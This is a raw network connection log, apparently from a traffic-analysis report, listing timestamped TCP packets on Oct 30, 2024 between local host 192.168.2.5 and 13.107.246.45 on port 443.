Oct 30, 2024 03:56:15.004933119 CET4435271213.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.078917980 CET4435271113.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.079076052 CET4435271113.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.079236984 CET52711443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.079310894 CET52711443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.079325914 CET4435271113.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.079336882 CET52711443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.079341888 CET4435271113.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.082390070 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.082499981 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.082600117 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.082762003 CET4435271313.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.082791090 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.082824945 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.083121061 CET52713443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.083134890 CET4435271313.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.083445072 CET52713443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.083450079 CET4435271313.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.137403965 CET4435271213.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.137434959 CET4435271213.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.137484074 CET4435271213.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.137540102 CET52712443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.137582064 CET52712443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.137809992 CET52712443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.137830019 CET4435271213.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.137842894 CET52712443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.137850046 CET4435271213.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.140801907 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.140830994 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.140917063 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.141382933 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.141396999 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.197206974 CET4435271413.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.197962999 CET52714443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.198081017 CET4435271413.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.198587894 CET52714443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.198605061 CET4435271413.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.213282108 CET4435271313.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.213435888 CET4435271313.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.213660955 CET52713443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.213660955 CET52713443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.213686943 CET52713443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.213697910 CET4435271313.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.216346025 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.216456890 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.216582060 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.216752052 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.216788054 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.239924908 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.240256071 CET52715443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.240266085 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.240596056 CET52715443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.240602016 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.328876019 CET4435271413.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.329068899 CET4435271413.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.329137087 CET52714443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.329462051 CET52714443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.329514980 CET4435271413.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.329540968 CET52714443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.329555988 CET4435271413.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.333839893 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.333872080 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.333986044 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.334387064 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.334399939 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.382313013 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.382388115 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.382476091 CET52715443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.382486105 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.382519960 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.382627010 CET52715443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.383336067 CET52715443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.383343935 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.383354902 CET52715443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.383358955 CET4435271513.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.387742996 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.387759924 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.387842894 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.388187885 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.388199091 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.830692053 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.832186937 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.832218885 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.832561970 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.832567930 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.873581886 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.874360085 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.874386072 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.874813080 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.874818087 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.961522102 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.961713076 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.961843014 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.961910963 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.961910963 CET52716443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.961955070 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.961983919 CET4435271613.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.964855909 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.964904070 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.964999914 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.965207100 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.965221882 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.972359896 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.972738981 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.972775936 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:15.973095894 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:15.973108053 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.002605915 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.002643108 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.002696991 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.002789974 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.002837896 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.004993916 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.005011082 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.005021095 CET52717443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.005026102 CET4435271713.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.008037090 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.008060932 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.008142948 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.008244038 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.008255959 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.082554102 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.083971977 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.084002018 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.084549904 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.084557056 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.105493069 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.105643034 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.105705023 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.105747938 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.105747938 CET52718443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.105786085 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.105806112 CET4435271813.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.108417988 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.108515024 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.108599901 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.108808994 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.108846903 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.159249067 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.160084963 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.160094976 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.160475969 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.160480976 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.213855982 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.214210987 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.214315891 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.214394093 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.214406013 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.214417934 CET52719443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.214421988 CET4435271913.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.217366934 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.217381001 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.217478037 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.217700958 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.217710972 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.295731068 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.295892954 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.296072960 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.296096087 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.296104908 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.296128035 CET52720443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.296133995 CET4435272013.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.298533916 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.298609972 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.298710108 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.298903942 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.298930883 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.727616072 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.728468895 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.728482962 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.728929996 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.728935957 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.733942032 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.734441042 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.734505892 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.734989882 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.735006094 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.852998972 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.853626013 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.853673935 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.854038000 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.854052067 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.857243061 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.857306957 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.857484102 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.857522011 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.857532978 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.857551098 CET52722443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.857554913 CET4435272213.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.860366106 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.860393047 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.860510111 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.860615969 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.860625982 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.868357897 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.868629932 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.868736029 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.868746042 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.868808031 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.869028091 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.869076967 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.869102955 CET52721443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.869117975 CET4435272113.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.871987104 CET52727443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.872081995 CET4435272713.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.872196913 CET52727443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.872350931 CET52727443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.872383118 CET4435272713.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.960797071 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.961410046 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.961422920 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.961875916 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.961879969 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.983357906 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.983422995 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.983520985 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.983592987 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.983654022 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.983913898 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.983963966 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.983994007 CET52723443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.984009027 CET4435272313.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.987061977 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.987119913 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:16.987220049 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.987411976 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:16.987428904 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.045351982 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.048113108 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.048171997 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.048702955 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.048715115 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.091725111 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.091871023 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.092102051 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.092130899 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.092139006 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.092148066 CET52724443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.092153072 CET4435272413.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.095284939 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.095351934 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.095427990 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.095602989 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.095626116 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.178455114 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.178528070 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.178648949 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.178749084 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.178875923 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.178910971 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.178936005 CET52725443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.178949118 CET4435272513.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.181915998 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.181946993 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.182040930 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.182226896 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.182246923 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.579979897 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.580482006 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.580490112 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.581101894 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.581105947 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.708812952 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.708874941 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.709127903 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.709172964 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.709180117 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.709191084 CET52726443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.709193945 CET4435272613.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.711949110 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.711999893 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.712090015 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.712286949 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.712304115 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.725457907 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.725811005 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.725845098 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.726217985 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.726226091 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.843909025 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.844194889 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.844209909 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.844506979 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.844511986 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.855901003 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.856955051 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.857023001 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.857079029 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.857095957 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.857112885 CET52728443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.857120037 CET4435272813.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.862061977 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.862138987 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.862248898 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.862503052 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.862539053 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.919771910 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.920136929 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.920152903 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.920509100 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.920514107 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.974124908 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.974189997 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.974270105 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.974303961 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.974325895 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.974379063 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.974567890 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.974591970 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.974606037 CET52729443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.974611998 CET4435272913.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.977555037 CET52733443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.977600098 CET4435273313.107.246.45192.168.2.5
Oct 30, 2024 03:56:17.977680922 CET52733443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.977880001 CET52733443192.168.2.513.107.246.45
Oct 30, 2024 03:56:17.977894068 CET4435273313.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.049112082 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.049298048 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.049361944 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.052050114 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.052068949 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.052082062 CET52730443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.052088022 CET4435273013.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.054872036 CET52734443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.054960012 CET4435273413.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.055042982 CET52734443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.055216074 CET52734443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.055244923 CET4435273413.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.445823908 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.446425915 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.446460962 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.446829081 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.446835995 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.576668024 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.576739073 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.576797962 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.577028036 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.577048063 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.577059031 CET52731443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.577065945 CET4435273113.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.579988003 CET52735443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.580033064 CET4435273513.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.580132008 CET52735443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.580265999 CET52735443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.580276012 CET4435273513.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.599633932 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.600119114 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.600162029 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.600516081 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.600528955 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.717946053 CET4435273313.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.718544960 CET52733443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.718566895 CET4435273313.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.719147921 CET52733443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.719151974 CET4435273313.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.732078075 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.732250929 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.732332945 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.732410908 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.732410908 CET52732443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.732455015 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.732487917 CET4435273213.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.734940052 CET52736443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.734986067 CET4435273613.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.735069036 CET52736443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.735387087 CET52736443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.735404015 CET4435273613.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.773361921 CET4435272713.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.773849010 CET52727443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.773909092 CET4435272713.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.774207115 CET52727443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.774221897 CET4435272713.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.791924000 CET4435273413.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.792260885 CET52734443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.792320013 CET4435273413.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.792551994 CET52734443192.168.2.513.107.246.45
Oct 30, 2024 03:56:18.792567015 CET4435273413.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.849059105 CET4435273313.107.246.45192.168.2.5
Oct 30, 2024 03:56:18.849225998 CET4435273313.107.246.45192.168.2.5
